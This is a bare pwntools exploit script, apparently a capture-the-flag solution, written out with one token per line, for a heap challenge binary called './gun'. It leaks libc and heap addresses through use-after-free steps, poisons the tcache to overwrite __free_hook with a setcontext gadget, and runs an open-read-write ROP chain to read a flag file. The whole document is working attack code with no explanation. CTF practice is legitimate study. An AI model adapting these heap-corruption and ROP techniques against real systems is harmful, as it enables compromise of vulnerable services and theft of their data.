from
pwn
import
*
s
=
lambda
buf: io.send(buf)
sl
=
lambda
buf: io.sendline(buf)
sa
=
lambda
delim, buf: io.sendafter(delim, buf)
sal
=
lambda
delim, buf: io.sendlineafter(delim, buf)
shell
=
lambda
: io.interactive()
r
=
lambda
n
=
None
: io.recv(n)
ra
=
lambda
t
=
tube.forever:io.recvall(t)
ru
=
lambda
delim: io.recvuntil(delim)
rl
=
lambda
: io.recvline()
rls
=
lambda
n
=
2
*
*
20
: io.recvlines(n)
libc_path
=
"/lib/x86_64-linux-gnu/libc-2.31.so"
elf_path
=
"./gun"
libc
=
ELF(libc_path)
elf
=
ELF(elf_path)
if
sys.argv[
1
]
=
=
'1'
:
context(log_level
=
'debug'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
elif
sys.argv[
1
]
=
=
'0'
:
context(log_level
=
'info'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
cho
=
b
'Action>'
siz
=
b
'Bullet price: '
con
=
b
'Bullet Name:'
ind
=
''
edi
=
''
def
add(size,content
=
'
',c='
3
'):
sal(cho,c)
err
=
rl()
if
(err
=
=
(b
' wrong game command!\n'
)):
sal(cho,c)
sal(siz,
str
(size))
sal(con,content)
def
add_0(size,content
=
'
',c='
3
'):
sal(cho,c)
sal(siz,
str
(size))
sal(con,content)
def
free(index,c
=
'1'
):
sal(cho,c)
sal(
"Shoot time: "
,
str
(index))
def
load(index,c
=
'2'
):
sal(cho,c)
sal(
'Which one do you want to load?'
,
str
(index))
def
exp():
global
io
io
=
process([elf_path])
name
=
'a'
*
0x18
sa(
"name:"
,name)
add(
0x440
,
'Large chunk(0x440)'
)
add_0(
0x10
,
'defense chunk(0x10)'
)
load(
0
)
free(
1
)
add_0(
0x10
,
'backback'
)
load(
0
)
free(
1
)
libc.address
=
u64(ru(b
"\x7f"
)[
-
6
:].ljust(
8
,b
'\x00'
))
-
1120
-
libc.sym[
'__malloc_hook'
]
-
0x10
success(
"libc:"
+
hex
(libc.address))
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
load(
0
)
load(
1
)
free(
2
)
add_0(
0x10
,
'p'
)
load(
0
)
free(
1
)
ru(b
'Pwn! The '
)
heap
=
u64(r(
6
).ljust(
8
,b
'\x00'
))
-
0x270
success(
"heap:"
+
hex
(heap))
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
add_0(
0x68
,
'ScUpax0s'
)
load(
0
)
load(
2
)
load(
3
)
load(
4
)
load(
5
)
load(
6
)
load(
7
)
load(
8
)
free(
8
)
load(
1
)
free(
2
)
free_hook
=
libc.sym[
'__free_hook'
]
success(
"free_hook:"
+
hex
(free_hook))
setcontext
=
libc.sym[
'setcontext'
]
+
61
orw_addr
=
heap
+
0x100
p
=
p64(
0
)
*
4
+
p64(setcontext)
frame_addr
=
heap
+
0x3d0
payload
=
flat(
0
,
frame_addr,
p64(
0
)
*
2
,
setcontext
)
ret
=
0x0000000000025679
+
libc.address
add_0(
0x68
,
'A'
*
0x10
)
add_0(
0x68
,flat(p64(
0
)
*
6
,orw_addr,ret))
add_0(
0x68
,
'C'
*
0x10
)
add_0(
0x68
,
'D'
*
0x10
)
add_0(
0x68
,
'E'
*
0x10
)
add_0(
0x68
,
'F'
*
0x10
)
add_0(
0x68
,
'J'
*
0x10
)
add_0(
0x68
,p64(heap
+
0x90
))
add_0(
0x68
,payload)
pop_rdi
=
0x0000000000026b72
+
libc.address
pop_rsi
=
0x0000000000027529
+
libc.address
pop_rdx_r12
=
0x000000000011c371
+
libc.address
syscall
=
0x000000000002584d
+
libc.address
pop_rax
=
0x000000000004a550
+
libc.address
flag_str_addr
=
heap
+
0x100
+
0xd8
flag_addr
=
heap
+
0x200
orw
=
flat(
pop_rdi,
flag_str_addr,
pop_rsi,
0
,
pop_rax,
2
,
libc.sym[
'open'
],
pop_rdi,
3
,
pop_rsi,
flag_addr,
pop_rdx_r12,
0x100
,
0
,
pop_rax,
0
,
libc.sym[
'read'
],
pop_rdi,
1
,
pop_rsi,
flag_addr,
pop_rdx_r12,
0x100
,
0
,
pop_rax,
1
,
libc.sym[
'write'
],
'./flag\x00'
)
success(
hex
(
len
(orw)))
add_0(
0x68
,payload)
add_0(
0x68
,p64(heap
+
0x10
)
*
8
+
p64(heap
+
0xf8
)
+
p64(heap
+
0x10
)
*
2
+
p64(heap
+
0x28
)
+
p64(heap
+
0xf8
))
add_0(
0x18
,
'a'
*
0x18
)
add_0(
0xc8
,
'aaaaaaaaaaa'
)
add_0(
0x98
,p64(heap
+
0x100
))
load(
0
)
load(
2
)
load(
3
)
load(
4
)
load(
5
)
free(
5
)
add_0(
0xe0
,orw)
add_0(
0x28
,p64(free_hook))
add_0(
0x38
,
'\x70'
)
magic_gadget
=
libc.address
+
0x0000000000154930
success(
"magic:"
+
hex
(magic_gadget))
add_0(
0x38
,p64(magic_gadget))
success(
"orw:"
+
hex
(heap
+
0x100
))
load(
8
)
shell()
exp()